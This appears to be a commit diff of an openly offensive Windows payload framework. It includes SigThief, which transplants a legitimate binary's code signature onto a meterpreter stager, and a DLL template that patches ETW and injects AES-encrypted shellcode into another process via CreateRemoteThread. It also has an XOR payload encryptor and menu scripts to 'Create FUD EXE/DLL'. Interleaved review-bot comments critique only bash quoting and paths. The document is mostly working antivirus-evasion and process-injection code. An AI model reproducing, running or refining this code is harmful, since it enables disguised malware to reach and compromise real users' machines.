+FIN.
+
+```
+
+### Use the ripped signature
+```
+$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
+Output file: x86_meterpreter_stager.exe_signed
+Signature appended. 
+FIN.
+
+```
+
+### Truncate (remove) signature
+This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
+
+```
+$ ./sigthief.py -i tcpview.exe -T    
+Inputfile is signed!
+Output file: tcpview.exe_nosig
+Overwriting certificate table pointer and truncating binary
+Signature removed. 
+FIN.
+```
+
+### Check if there is a signature (does not check validity)
+```
+$ ./sigthief.py -i tcpview.exe -c
+Inputfile is signed!
+```

+ 269 - 0
Harriet/DLLInj/SigThief/sigthief.py

@@ -0,0 +1,269 @@
+#!/usr/bin/env python3
+# LICENSE: BSD-3
+# Copyright: Josh Pitts @midnite_runr
+
+import sys
+import struct
+import shutil
+import io
+from optparse import OptionParser
+
+
+def gather_file_info_win(binary):
+        """
+        Borrowed from BDF...
+        I could just skip to certLOC... *shrug*
+        """
+        flItms = {}
+        binary = open(binary, 'rb')
+        binary.seek(int('3C', 16))
+        flItms['buffer'] = 0
+        flItms['JMPtoCodeAddress'] = 0
+        flItms['dis_frm_pehdrs_sectble'] = 248
+        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
+        # Start of COFF
+        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
+        binary.seek(flItms['COFF_Start'])
+        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
+        binary.seek(flItms['COFF_Start'] + 2, 0)
+        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
+        binary.seek(flItms['COFF_Start'] + 16, 0)
+        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
+        #End of COFF
+        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
+
+        #if flItms['SizeOfOptionalHeader']:
+            #Begin Standard Fields section of Optional Header
+        binary.seek(flItms['OptionalHeader_start'])
+        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
+                                                               binary.read(4))[0]
+        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
+        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
+        if flItms['Magic'] != 0x20B:
+            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
+        # End Standard Fields section of Optional Header
+        # Begin Windows-Specific Fields of Optional Header
+        if flItms['Magic'] == 0x20B:
+            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
+        else:
+            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfImageLoc'] = binary.tell()
+        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
+        if flItms['Magic'] == 0x20B:
+            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
+
+        else:
+            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
+        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
+        # End Windows-Specific Fields of Optional Header
+        # Begin Data Directories of Optional Header
+        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
+        #ImportTable SIZE|LOC
+        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['CertTableLOC'] = binary.tell()
+        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
+        binary.close()
+        return flItms
+
+
+def copyCert(exe):
+    flItms = gather_file_info_win(exe)
+
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Input file Not signed!")
+        sys.exit(-1)
+
+    with open(exe, 'rb') as f:
+        f.seek(flItms['CertLOC'], 0)
+        cert = f.read(flItms['CertSize'])
+    return cert
+
+
+def writeCert(cert, exe, output):
+    flItms = gather_file_info_win(exe)
+    
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+
+    print("Signature appended. \nFIN.")
+
+
+def outputCert(exe, output):
+    cert = copyCert(exe)
+    if not output:
+        output = str(exe) + "_sig"
+
+    print("Output file: {0}".format(output))
+
+    open(output, 'wb').write(cert)
+
+    print("Signature ripped. \nFIN.")
+
+
+def check_sig(exe):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+    else:
+        print("Inputfile is signed!")
+
+
+def truncate(exe, output):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+        sys.exit(-1)
+    else:
+        print( "Inputfile is signed!")
+
+    if not output:
+        output = str(exe) + "_nosig"
+
+    print("Output file: {0}".format(output))
+
+    shutil.copy2(exe, output)
+
+    with open(output, "r+b") as binary:
+        print('Overwriting certificate table pointer and truncating binary')
+        binary.seek(-flItms['CertSize'], io.SEEK_END)
+        binary.truncate()
+        binary.seek(flItms['CertTableLOC'], 0)
+        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
+
+    print("Signature removed. \nFIN.")
+
+
+def signfile(exe, sigfile, output):
+    flItms = gather_file_info_win(exe)
+    
+    cert = open(sigfile, 'rb').read()
+
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+    
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+    print("Signature appended. \nFIN.")
+
+
+if __name__ == "__main__":
+    usage = 'usage: %prog [options]'
+    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
+    parser = OptionParser()
+    parser.add_option("-i", "--file", dest="inputfile", 
+                  help="input file", metavar="FILE")
+    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
+                  help='rip signature off inputfile')
+    parser.add_option('-a', '--add', dest='addsig', action='store_true',
+                  help='add signautre to targetfile')
+    parser.add_option('-o', '--output', dest='outputfile',
+                  help='output file')
+    parser.add_option('-s', '--sig', dest='sigfile',
+                  help='binary signature from disk')
+    parser.add_option('-t', '--target', dest='targetfile',
+                  help='file to append signature to')
+    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
+                  help='file to check if signed; does not verify signature')
+    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
+                  help='truncate signature (i.e. remove sig)')
+    (options, args) = parser.parse_args()
+    
+    # rip signature
+    # inputfile and rip to outputfile
+    if options.inputfile and options.ripsig:
+        print("Ripping signature to file!")
+        outputCert(options.inputfile, options.outputfile)
+        sys.exit()    
+
+    # copy from one to another
+    # inputfile and rip to targetfile to outputfile    
+    if options.inputfile and options.targetfile:
+        cert = copyCert(options.inputfile)
+        writeCert(cert, options.targetfile, options.outputfile)
+        sys.exit()
+
+    # check signature
+    # inputfile 
+    if options.inputfile and options.checksig:
+        check_sig(options.inputfile) 
+        sys.exit()
+
+    # add sig to target file
+    if options.targetfile and options.sigfile:
+        signfile(options.targetfile, options.sigfile, options.outputfile)
+        sys.exit()
+        
+    # truncate
+    if options.inputfile and options.truncate:
+        truncate(options.inputfile, options.outputfile)
+        sys.exit()
+
+    parser.print_help()
+    parser.error("You must do something!")
+

+ 177 - 0
Harriet/DLLInj/template.cpp

@@ -0,0 +1,177 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <tlhelp32.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
+
+char XOR_VARIABLE []= "XOR_KEY";
+
+unsigned char fRandom6 []=VIRALO}; 
+unsigned char Random9[]=PROCY};
+
+int aRandom1(char * eRandom5, unsigned int eRandom5_len, char * key, size_t keylen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, eRandom5, &eRandom5_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+int bRandom2(const char *procname) {
+
+        HANDLE hProcSnap;
+        PROCESSENTRY32 pe32;
+        int pid = 0;
+ 
+        hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+        if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
+                
+        pe32.dwSize = sizeof(PROCESSENTRY32); 
+                
+        if (!Process32First(hProcSnap, &pe32)) {
+                CloseHandle(hProcSnap);
+                return 0;
+        }
+                
+        while (Process32Next(hProcSnap, &pe32)) {
+                if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
+                        pid = pe32.th32ProcessID;
+                        break;
+                }
+        }
+                
+        CloseHandle(hProcSnap);
+                
+        return pid;
+}
+
+
+int cRandom3(HANDLE hProc, unsigned char * eRandom5, unsigned int eRandom5_len) {
+
+        LPVOID pRemoteCode = NULL;
+        HANDLE hThread = NULL;
+
+  
+        pRemoteCode = VirtualAllocEx(hProc, NULL, eRandom5_len, MEM_COMMIT, PAGE_EXECUTE_READ);
+        WriteProcessMemory(hProc, pRemoteCode, (PVOID)eRandom5, (SIZE_T)eRandom5_len, (SIZE_T *)NULL);
+        
+        hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL);
+        if (hThread != NULL) {
+                WaitForSingleObject(hThread, 500);
+                CloseHandle(hThread);
+                return 0;
+        }
+        return -1;
+}
+
+void gRandom7(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
+        int r;
+        r = 0;
+        for (int i = 0; i < tada_len; i++) {
+                if (r == XOR_VARIABLE_len - 1) r = 0;
+
+                tada[i] = tada[i] ^ XOR_VARIABLE[r];
+                r++;
+        }
+}
+
+
+extern __declspec(dllexport) int Go(void);
+int Go(void) {
+
+	void * Random8_mem;
+	BOOL rv;
+	HANDLE th;
+    DWORD oldprotect = 0;
+    
+	int pid = 0;
+    HANDLE hProc = NULL;
+	char dRandom4 []=KEYVALUE  
+	unsigned char eRandom5[] =PAYVAL 
+ 
+	unsigned int eRandom5_len = sizeof(eRandom5);
+
+	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
+        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
+
+        #ifdef _WIN64
+        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
+        #else
+        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
+        #endif  
+
+        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
+
+	FreeConsole;
+
+	gRandom7((char *) fRandom6, sizeof (fRandom6), XOR_VARIABLE, sizeof(XOR_VARIABLE));
+        Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), fRandom6);
+
+	
+	Random8_mem = Virt_Alloc(0, eRandom5_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+	aRandom1((char *) eRandom5, eRandom5_len, dRandom4, sizeof(dRandom4));
+	
+	RtlMoveMemory(Random8_mem, eRandom5, eRandom5_len);
+	
+	rv = VirtualProtect(Random8_mem, eRandom5_len, PAGE_EXECUTE_READ, &oldprotect);
+
+	gRandom7((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
+	
+	pid = bRandom2(Random9);
+
+	if (pid) {
+
+		hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
+						PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
+						FALSE, (DWORD) pid);
+
+		if (hProc != NULL) {
+			cRandom3(hProc, eRandom5, eRandom5_len);
+			CloseHandle(hProc);
+		}
+	}
+	return 0;
+}
+
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
+
+	switch ( fdwReason ) {
+			case DLL_PROCESS_ATTACH:
+					Go();
+					break;
+			case DLL_THREAD_ATTACH:
+					break;
+			case DLL_THREAD_DETACH:
+					break;
+			case DLL_PROCESS_DETACH:
+					break;
+			}
+	return TRUE;
+}

+ 32 - 0
Harriet/DLLInj/xor.py

@@ -0,0 +1,32 @@
+# Red Team Operator course code template
+# payload encryption with XOR
+#
+# author: reenz0h (twitter: @sektor7net)
+
+import sys
+
+KEY = "XOR_KEY"
+
+def xor(data, key):
+	l = len(key)
+	output_str = ""
+
+	for i in range(len(data)):
+		current = data[i]
+		current_key = key[i%len(key)]
+		output_str += chr(ord(current) ^ ord(current_key))
+	
+	return output_str
+
+def printC(ciphertext):
+	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
+
+try:
+    plaintext = open(sys.argv[1], "r").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = xor(plaintext, KEY)
+
+printC(ciphertext)

+ 84 - 0
Harriet/EXE.sh

@@ -0,0 +1,84 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+     _   _                 _      _   
+    | | | |               (_)    | |  
+    | |_| | __ _ _ __ _ __ _  ___| |_ 
+    |  _  |/ _  | __|  __| |/ _ \ __|
+    | | | | (_| | |  | |  | |  __/ |_ 
+    \_| |_/\__,_|_|  |_|  |_|\___|\__|
+                                                                                
+          **by assume-breach**
+
+A Payload Framework Waiting To Be Signatured"
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE Fully-Automated AES Encryption"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE Fully-Automated AES Encryption w/ Process Injection"
+echo -e "$BOLD_BLUE 3.$BOLD_WHITE Fully-Automated AES Encrypted QueueUserAPC Shellcode Execution"
+echo -e "$BOLD_BLUE 4.$BOLD_WHITE Fully-Automated AES Encrypted ThreadPoolWait Shellcode Execution"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash Harriet/FULLAes/FULLAes.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash Harriet/FULLInj/FULLInj.sh
+
+elif [ $CHOICE == 3 ]; then
+        echo ""
+        bash Harriet/QueueUserAPC/QueueUser.sh
+
+elif [ $CHOICE == 4 ]; then
+        echo ""
+        bash Harriet/ThreadPoolWait/TPW.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi
+
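Review bot: The menu tests at `if [ $CHOICE == 1 ]` and the three `elif` branches leave `$CHOICE` unquoted, so pressing Enter on an empty prompt yields `[: ==: unary operator expected` and any input containing whitespace becomes a syntax error rather than reaching the "Invalid option" branch; the same pattern is in Harriet.sh and, from the head of this commit, DLL.sh. Quoting the variable or using the bash test fixes it: `if [[ "$CHOICE" == 1 ]]; then`. `read CHOICE` should also be `read -r CHOICE` so backslashes in the input are not interpreted. Registering `trap easyexit EXIT` only in the else branch after the `sleep` works, but a plain `clear; exit 1` there would be clearer and would return a non-zero status for the invalid selection.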

+ 73 - 0
Harriet/Harriet.sh

@@ -0,0 +1,73 @@
+\#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+     _   _                 _      _   
+    | | | |               (_)    | |  
+    | |_| | __ _ _ __ _ __ _  ___| |_ 
+    |  _  |/ _  | __|  __| |/ _ \ __|
+    | | | | (_| | |  | |  | |  __/ |_ 
+    \_| |_/\__,_|_|  |_|  |_|\___|\__|
+                                                                                
+          **by assume-breach**
+
+A Payload Framework Waiting To Be Signatured"
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE Create FUD EXE"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE Create FUD DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash EXE.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash DLL.sh
+
+else
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi
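Review bot: The first line reads `\#!/bin/bash`; if that backslash is really in the file and not a rendering artifact, the line is no longer a shebang but a command named `#!/bin/bash`, which prints "command not found" on every run and leaves the script without a declared interpreter when executed directly. The sub-script paths also look inconsistent: this file runs `bash EXE.sh` (relative to the Harriet/ directory), while EXE.sh runs `bash Harriet/FULLAes/FULLAes.sh` (relative to the repository root), so unless the directory layout is nested one of the two invocations fails depending on the working directory. Resolving paths against the script's own location avoids that, e.g. `cd -- "$(dirname -- "${BASH_SOURCE[0]}")" || exit 1` near the top, with the callee paths made consistent with it.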
